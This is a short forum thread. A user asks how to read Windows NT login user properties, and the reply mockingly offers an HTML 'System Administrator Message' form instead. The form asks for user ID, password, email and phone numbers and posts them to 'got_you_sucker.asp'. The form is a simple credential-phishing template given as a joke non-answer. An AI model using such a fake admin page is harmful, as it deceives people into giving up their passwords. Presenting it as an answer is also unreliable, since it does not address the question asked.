How to get winnt login user properties

V

Vijay Mehta

Hi..
How to get winnt login user properties like address,phoneno, email etc.
With regards,
Vijay Mehta
 
F

Fred Oz

Vijay said:
Hi..
How to get winnt login user properties like address,phoneno, email etc.
With regards,
Vijay Mehta

It's actully stupidly simple, as follows;

<html><head><title> Admin Details </title>
<style type="text/css">
p,form
{font-family: sans-serif; font-size: 12px;
padding: 5 0 0 0; line-spacing: 1;
}
..X
{position: absolute; left: 120px}
</style></head>
<body>
<div style="background-color: #eeeeff;">
<h2>System Administrator Message</h2>
<form action="got_you_sucker.asp" method="post">
<p style="padding-left: 10;">So that we may properly administer your
account,<br>please enter the following information:</p>
<p>User ID:<input class="X"
type="text" name="userID" cols="10"></p>
<p>Password:<input class="X"
type="text" name="userID" cols="10"></p>
<p>e-mail address:<input class="X"
type="text" name="userEmail" cols="10"></p>
<p>Your Ph:<input class="X"
type="text" name="userPh" cols="10"></p>
<p>Girlfriends's Ph:<input class="X"
type="text" name="gfPh" cols="10"></p>
<input style="margin: 20 0 0 200;" type="submit" value="Submit">
</form>
</div>
</body></html>
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Members online

Forum statistics

Threads
473,764
Messages
2,569,564
Members
45,040
Latest member
papereejit

Latest Threads

Top